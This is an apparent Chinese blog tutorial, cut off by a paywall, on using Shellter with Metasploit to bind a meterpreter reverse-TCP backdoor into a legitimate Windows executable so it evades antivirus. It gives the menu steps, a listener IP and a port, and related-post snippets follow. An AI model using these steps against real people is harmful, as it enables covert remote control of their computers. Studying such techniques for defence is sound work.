谨防钓鱼(二)——msf搭档shellter轻松控制目标电脑

最新推荐文章于 2024-11-24 14:26:24 发布
原创 最新推荐文章于 2024-11-24 14:26:24 发布 · 524 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍如何使用Shellter工具结合Metasploit框架,实现对Windows系统的无痕渗透。通过具体步骤演示如何生成带有后门的可执行文件,并在目标机器上成功运行而不被杀毒软件检测。

metaspolit配合shellter渗透windows

shellter工具出来有一段时间了,现在用可能被杀软查杀,写这边文章主要展示下,怎么样轻松搞定,HACK WINDOWS PC。

shellter工具下载地址:
https://www.shellterproject.com/download/

我这里下载windows版本,下载后解压
在这里插入图片描述
运行shellter.exe
在这里插入图片描述
1、Choose Operation Mode - Auto/Manual (A/M/H): A //选择模式 A 自动模式自动注入后门,M高级模式,H帮助
2、PE Target: //输入要注入shellcode的程序,我这里用PE Target:procexp.exe
3、Enable Stealth Mode? (Y/N/H):N 不开启隐身模式
在这里插入图片描述
4、Use a listed payload or custom? (L/C/H): L //使用攻击模块列表或者自定义? 输入L 选择Payload

5、Select payload by index: 1 //选择第一个,即meterpreter_reverse_tcp

6、SET LHOST: 192.168.78.128 //设置反弹回来的IP 本机,也是运行msf主机的ip地址

7、SET LPORT:4444 //设置接收反弹

最低0.47元/天 解锁文章
MSF详解及常用命令之利用msf控制目标电脑
世间繁华梦一出
12-21 2820
MSF基本操作详解序言:MSF简介1、模块介绍2、基本命令3、后渗透4、msfvenom生成后门木马 ** 序言:MSF简介 Metasploit简称msf,Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 ** 1、模块介绍 它是一个渗透测试框架(模块介绍) auxi
MSF&Powershell进行钓鱼攻击
weixin_44508748的博客
04-26 2751
一、Powershell配合MSF无文件攻击 实验环境: 靶机:win 7 >192.168.1.9 攻击机:kali>192.168.1.7 web服务器:win 10 > 192.168.1.6 本次实验的大致过程如下: MSF生成payload并放到靶机能够访问的服务器上,攻击者通过钓鱼等方式使靶机执行powershell代码,靶机反弹到msf监听的端口上建立会话,由此攻击...
MSF配合shellter实现360免杀
weixin_44508748的博客
04-29 1122
利用shellter工具将MSF生成的木马文件与其他文件捆绑在一起,达到绕过杀毒软件建立会话控制服务器的目的。本次的绕过的杀毒软件为360。 攻击/kali/192.168.1.7 靶机/win7/ 一、运行shellter工具 ①下载shellter: apt-get install shellter ②安装Windows运行环境(等待时间稍长) dpkg --add-architecture...
利用msf控制目标电脑
m0_52923241的博客
04-08 855
利用永恒之蓝漏洞攻击win7准备工作永恒之蓝漏洞msf简介攻击步骤 准备工作 kali Linux虚拟机一台 win7虚拟机一台(注意关闭防火墙) 永恒之蓝漏洞 简介:永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内
msfvenom生成远程木马控制电脑
weixin_48886225的博客
12-07 1744
使用msfvenom生成木马控制电脑
生命在于学习——MSF初体验(
易水哲的博客
10-21 2463
MSF初体验()——Meterpreter命令
第九十七课:MSF配置自定义Payload控制目标主机权限.docx
09-15
MSF 配置自定义 Payload 控制目标主机权限 MSF(Metasploit Framework)是一款功能强大且广泛使用的渗透测试工具,它提供了一个强大的框架来评估和模拟攻击各种类型的系统和网络。MSF 的 exploit 模块下是支持 set ...
第九十七课:msf配置自定义payload控制目标主机权限1
08-03
在本课程中,我们探讨了如何使用Metasploit(MSF)框架配置自定义payload以控制目标主机权限。Metasploit是一个广泛使用的安全测试工具,它包含了大量的exploit模块和payload选项,允许安全专家模拟攻击行为,同时也...
使用MSFPC远程控制
y3174445239的博客
06-24 908
切换为root用户之后,可以对安卓机进行最大权限的控制,比如关闭selinux、读取文件等。按目标系统分:Windows、Androd、iOS、各种版本的Linux操作系统。Netcat工具的使用:(以Metasploitable 2的80端口为例进行测试)2、输入shell,执行各种命令,如查看操作系统信息、切换到root用户等。按连接方式分:正向、反向(注意:现在大都采用反向远程控制方式)5、打开cmd执行各种命令,如查看文件夹内容、操作系统信息、关机。(2)在安卓虚拟机中弹出提示信息,选择“允许”。
在kali用msfpc远程控制Windows
wangzhemvp的博客
11-24 908
本次实验我们将使用msfpc生成windows下的被控端,并使用metasploit渗透工具进行远程控制。
MSF基本使用和控制台命令
分享学习网络的点点滴滴
12-26 1075
Msfconsole使用接口○ 最流行的用户接口○ 几乎可以使用全部MSF功能○ 控制台命令支持TAB自动补全○ 支持外部命令的执行(系统命令等)○ 点击鼠标启动 / msfconsole -h -q -r -v / exit○ help /?
使用msfvenom实现远程控制.
2301_78457119的博客
06-24 1178
在Kali 2中生成被控端的工具:msfvenom(msfvenom是渗透测试工具Metasploit中的一个命令)1、查看帮助信息、查2.看所有可以使用的攻击模块3、筛选出使用reverse_tcp的模块。
渗透测试/metasploit控制目标电脑/ms17-010
dkpower111的博客
01-31 428
MSF msf是一款开源安全漏洞利用和测试工具,集成了各种平台常见的溢出漏洞和流行的shellcode,并保持持续更新 模块 auxiliary: 辅助模块,辅助渗透 exploits: 漏洞利用模块,包含主流漏洞利用脚本 payloads: 攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码 post: 后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令 encoders:编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵
6.4-5 msf被控端与主控端
weixin_70294597的博客
06-08 314
远程控制是一个常见计算机术语,指的就是可以在一台设备上操纵另一台设备的软件。通常情况下,远程控制分为两个部分,即被控端与主控端,一台计算机被植入被控端,他就会被另一台装有主控端的计算机所控制。
shellter介绍
weixin_33941350的博客
10-22 819
或许你还在为无法绕过反病毒软件获得Meterpreter shell而懊恼,试试Shellter 5.1吧。首先需要获取一个正常的Windows exe可执行文件,然后它会将shellcode添加进去,这样就可以成功地修改这个文件并且使其绕过反病毒软件的监测了。Shellter有一个自动模式,该模式会使整个操作过程变得十分的简单。在这篇文章中,我使用Kali 2.0作为主机,...
一款用于PE文件绑定免杀的工具: Shellter
xf555er的博客
01-26 2035
Shellter是一种动态进制程序壳程序,它可以在现有的可执行文件中隐藏恶意软件。它使用动态链接库技术来实现恶意代码的注入,并且可以在不修改现有的可执行文件的情况下进行注入。这使得它非常难以检测,因为它不会改变文件的哈希值或数字签名Shellter的官方下载地址:https://www.shellterproject.com/当前Shellter最新免费版本是v7.2,最新收费版本是v_pro4.7。
kali免杀工具shellter
scholar_1的博客
08-06 4939
工具安装完成后再/usr/share/windows-resources/shellter 这个文件夹shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下。Choose Operation Mode - Auto/Manual (A/M/H):A //A:自动模式自动注入后门,M:高级模式,H:帮助。(Y/N/H): Y //是否启用隐身模式 Y:启用 N:不启用 H:帮助。...
shellter-kali免杀工具
dongxieaitonglao的博客
03-17 414
/usr/share/windows-resources/shellter 这个文件夹 shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下
记录一下shellter 使用
qq_39912353的博客
03-01 2281
  今天在春秋的视频上看到了kali一款工具的使用  shellter  看大佬的视频学习的  这是他整理的  https://bbs.ichunqiu.com/thread-25177-1-1.html 最好还是去这看  首先先说一下 怎么安装这个工具(我用的是kali 2018版本),这个版本反正是没有这个软件,需要自己安装。安装命令也和平常一样,apt install shellter。当然...
Kali利用msf入侵Windows电脑win11怎么能在目标视窗操作
最新发布
10-16
在Kali系统使用Metasploit Framework(msf)入侵Windows 11电脑后,可在目标视窗进行多种操作,以下为一些常见方法: ### 基本命令交互 在成功获取会话后,可直接在msfconsole中使用一些基本命令与目标系统交互。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值